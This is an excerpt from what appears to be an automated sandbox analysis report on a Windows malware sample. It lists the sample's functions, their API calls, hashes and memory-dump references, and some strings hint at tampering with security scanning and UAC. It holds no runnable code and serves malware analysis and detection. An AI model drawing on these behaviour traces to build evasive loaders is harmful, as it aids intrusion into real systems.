                                                                                          • Part of subcall function 02D65A90: RegCloseKey.ADVAPI32(?,02D65B9C,00000000,?,?,00000000,02D65B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D65B8F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                        • String ID:
                                                                                        • API String ID: 2796650324-0
                                                                                        • Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                        • Instruction ID: d1a42ee39d8f65d1425a82f6e77e0f3d559cd5c29acb2d933c3873911a8c19f3
                                                                                        • Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
                                                                                        • Instruction Fuzzy Hash: 65E06D71A002148BCB10DE5898C4A6633D8AB08754F840961EC58CF346D371DD548BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D67D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02D67DB0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3934441357-0
                                                                                        • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                        • Instruction ID: 4f7f0dd44e264992265401d4dc93a286f674a0f3cb057235a93e077e3da80fa2
                                                                                        • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                        • Instruction Fuzzy Hash: 1FD05BB23091507BE220955B6C44EB75BDDCBC9771F10067DB568C3280D720CC01C6B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D67E18 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02D7E0EE,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,UacInitialize), ref: 02D67E23
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 951039ecee422536e3dea04a53b9578876d15029f98b4fa6b434c683e6939a5b
                                                                                        • Instruction ID: 7997b5d7ee45f11b30ee913ae643d1d7b1e9bf9944e9108bb2cbfa3104b668fd
                                                                                        • Opcode Fuzzy Hash: 951039ecee422536e3dea04a53b9578876d15029f98b4fa6b434c683e6939a5b
                                                                                        • Instruction Fuzzy Hash: 3AC08CA1202301077A6061FC1CCC13A8288C94413C7240B7AF028D63E2D325CC5AA8B0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D67E3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02D81133,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanBuffer,02DC5344,02D88FEC,ScanString), ref: 02D67E47
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 3fca3ef7285960aff002ce6aaf6464954507beed463b747c503eea14233f1ce8
                                                                                        • Instruction ID: f6e01d227f964198d6ad6cd0d6776d8b313f1cb219e0b48a064d23ad71a7b772
                                                                                        • Opcode Fuzzy Hash: 3fca3ef7285960aff002ce6aaf6464954507beed463b747c503eea14233f1ce8
                                                                                        • Instruction Fuzzy Hash: 82C08CA060230A0F7E6062FC2CCC3B9828AC94413CB201B66E028E63D2D316DC6A6830
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D64C60 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(02D7D42C), ref: 02D64C32
                                                                                        • SysReAllocStringLen.OLEAUT32(02D89E50,02D7D42C,00000016), ref: 02D64C7A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: String$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 344208780-0
                                                                                        • Opcode ID: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                        • Instruction ID: 327eb52f47fd56ab1e507a5060800b6cc4d82ed2a10f136feedcb925960a408f
                                                                                        • Opcode Fuzzy Hash: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                        • Instruction Fuzzy Hash: 10D080741001025F9F3CD6198A0D93761AFDDE034F74ECA5D98024A340E761CC00DE35
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D64C3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID:
                                                                                        • API String ID: 3341692771-0
                                                                                        • Opcode ID: aa052d25dd78002e50aa44a6486536333a5d6d40c34ef5eb19ce88693e560bd5
                                                                                        • Instruction ID: 904e91447aec64527718dfb16fa50df56871f8e38c03591d2e6d351fb34150b5
                                                                                        • Opcode Fuzzy Hash: aa052d25dd78002e50aa44a6486536333a5d6d40c34ef5eb19ce88693e560bd5
                                                                                        • Instruction Fuzzy Hash: 9AC012A26402204BEF359AA8ACC8BA662CDDB092A9F1940A1E518DB340E760DC10CAB4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D89B3C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • timeSetEvent.WINMM(00002710,00000000,02D89B30,00000000,00000001), ref: 02D89B4C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Eventtime
                                                                                        • String ID:
                                                                                        • API String ID: 2982266575-0
                                                                                        • Opcode ID: a8219cda056f842b4098c733d0361f53bc46904d3749f4f51ebb05d3126cb7af
                                                                                        • Instruction ID: 8de1d26668cc76e9f8c4774486aa26d8893628e30bc002ad05b2fe7305627040
                                                                                        • Opcode Fuzzy Hash: a8219cda056f842b4098c733d0361f53bc46904d3749f4f51ebb05d3126cb7af
                                                                                        • Instruction Fuzzy Hash: CDC048B17A1341AAF610AAA42DE6FB3168ED704B00FA00812B645AE3C1D5E2AC105A64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D64BFC Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02D64C03
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 2525500382-0
                                                                                        • Opcode ID: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                        • Instruction ID: 7fa9654c619dc1b8c4e340c417ac5ddaa9d4dca084bfad01a57dfb202b2682f5
                                                                                        • Opcode Fuzzy Hash: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                        • Instruction Fuzzy Hash: A6B012382082021BFA7412220F0D732004D4FA13CDF8800519E58C83C0FB01CC11CC3A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D64C14 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02D64C1B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeString
                                                                                        • String ID:
                                                                                        • API String ID: 3341692771-0
                                                                                        • Opcode ID: 98a5ded0fdb0df2e5a062e13461102ebbb408f0f94918d0aa90ba91e9420b17a
                                                                                        • Instruction ID: df6f6aaff14e4aab3e3bebcf6821c9bba13ad9841365e76f1852ef70f2e303aa
                                                                                        • Opcode Fuzzy Hash: 98a5ded0fdb0df2e5a062e13461102ebbb408f0f94918d0aa90ba91e9420b17a
                                                                                        • Instruction Fuzzy Hash: 70A011A80002020B8A2A222A002823A2023AECA200B8AC8A802008A300CA2A8800A8B8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D615CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02D61A03,?,02D62000), ref: 02D615E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 7583d7255f222449d09a77f71fb5057381d428de0b4abce32f24faab32279f3d
                                                                                        • Instruction ID: 9c71fcc7b7aabd638fed9fb24b0bfc38f9f7e88ab704ee8f96525dc3f3bc6294
                                                                                        • Opcode Fuzzy Hash: 7583d7255f222449d09a77f71fb5057381d428de0b4abce32f24faab32279f3d
                                                                                        • Instruction Fuzzy Hash: FBF06DF0B413028FDB06CF7999893117BE2E789348F20857DDA09DB3D8EB7188058B10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D61682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02D62000), ref: 02D616A4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: b313a0b8611b45c7ddf84b51a5d6d817a60cc285a5866167e6a7d0760f5b52f5
                                                                                        • Instruction ID: dda4152b45800e7bc8c5a043f02f1a1a4d5183b17a93f4bcd1b6cb3d5ab5d5eb
                                                                                        • Opcode Fuzzy Hash: b313a0b8611b45c7ddf84b51a5d6d817a60cc285a5866167e6a7d0760f5b52f5
                                                                                        • Instruction Fuzzy Hash: 83F090B2A416966FD7109F9AAC94792BBA4FB05314F254139E90897380D770AC108BD4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D616E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02D61704
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: 20eaa4748fd6da7cda3b3287955ef1c2d358948f0de6f985811a1b737aa6f113
                                                                                        • Instruction ID: cb94b6e7ef8a3f2b99f9fe984f33050fb5e05ec89922113c6505a8734c0a8a0e
                                                                                        • Opcode Fuzzy Hash: 20eaa4748fd6da7cda3b3287955ef1c2d358948f0de6f985811a1b737aa6f113
                                                                                        • Instruction Fuzzy Hash: 70E08675300351AFD7105B795D497226BD8EB59654F294475F549DB381D2A0EC108B70
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 02D79B94 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02D79E1B,?,?,02D79EAD,00000000,02D79F89), ref: 02D79BA8
                                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02D79BC0
                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02D79BD2
                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02D79BE4
                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02D79BF6
                                                                                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02D79C08
                                                                                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02D79C1A
                                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02D79C2C
                                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02D79C3E
                                                                                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02D79C50
                                                                                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02D79C62
                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02D79C74
                                                                                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02D79C86
                                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02D79C98
                                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02D79CAA
                                                                                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02D79CBC
                                                                                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02D79CCE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                        • API String ID: 667068680-597814768
                                                                                        • Opcode ID: 9e239f32c0d2a48fdce6b992a8a1e085a7d68271de06548dd98ee97ba25609a4
                                                                                        • Instruction ID: 291d4fb462f298736753543fec7fcb58c632d4a0ba7109a552cafc6c9e65056f
                                                                                        • Opcode Fuzzy Hash: 9e239f32c0d2a48fdce6b992a8a1e085a7d68271de06548dd98ee97ba25609a4
                                                                                        • Instruction Fuzzy Hash: 0A311271951266AFEB009FB4F899A6933A9E706301B900995A415EF314F77CEC14CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D658CC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,02D66BD0,02D60000,02D8B790), ref: 02D658E9
                                                                                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02D65900
                                                                                        • lstrcpynA.KERNEL32(?,?,?), ref: 02D65930
                                                                                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02D66BD0,02D60000,02D8B790), ref: 02D65994
                                                                                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02D66BD0,02D60000,02D8B790), ref: 02D659CA
                                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02D66BD0,02D60000,02D8B790), ref: 02D659DD
                                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D66BD0,02D60000,02D8B790), ref: 02D659EF
                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D66BD0,02D60000,02D8B790), ref: 02D659FB
                                                                                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D66BD0,02D60000), ref: 02D65A2F
                                                                                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D66BD0), ref: 02D65A3B
                                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02D65A5D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                        • API String ID: 3245196872-1565342463
                                                                                        • Opcode ID: e9316fc9932dd79705971b89bdaf370b403c456c16e50a61e57b472caa2ce33c
                                                                                        • Instruction ID: 4d4cb957462bf84707d1d2f4ce534bbdcb50ab2b6dc25eed7b7f10d491b7301c
                                                                                        • Opcode Fuzzy Hash: e9316fc9932dd79705971b89bdaf370b403c456c16e50a61e57b472caa2ce33c
                                                                                        • Instruction Fuzzy Hash: C5414C72D00219ABDB10DAE8DC8DAEEB7ADEF08354F4845A5A149D7340E734DF848F64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D65B9C Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D65BAC
                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D65BB9
                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D65BBF
                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D65BEA
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D65C31
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D65C41
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D65C69
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D65C79
                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D65C9F
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D65CAF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                        • API String ID: 1599918012-2375825460
                                                                                        • Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                        • Instruction ID: 466bb241345b1b1319451c9b936806f3364f022f4cad71593baa88394c133c42
                                                                                        • Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                        • Instruction Fuzzy Hash: 2F3152B1E4011D2BEB25D6B8DC4EBFE77AE8B04380F4541A19648E6381D674DEC4CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D67F90 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02D67FB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 1705453755-0
                                                                                        • Opcode ID: b0f2a126e6bfdbec3624709fe996a37f07710e4d7c3479fe4a57f6dc015cd93b
                                                                                        • Instruction ID: 8f284ac1a3e2938d1da3590e6ec1019c1f7551b2014b68d60eee3e98d30c9838
                                                                                        • Opcode Fuzzy Hash: b0f2a126e6bfdbec3624709fe996a37f07710e4d7c3479fe4a57f6dc015cd93b
                                                                                        • Instruction Fuzzy Hash: 0511BAB5A00209AF9B04CF99C9819AFF7F9EFC8700B54C569A509E7254E6719E418BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D6A780 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D6A79E
                                                                                        Memory Dump Source
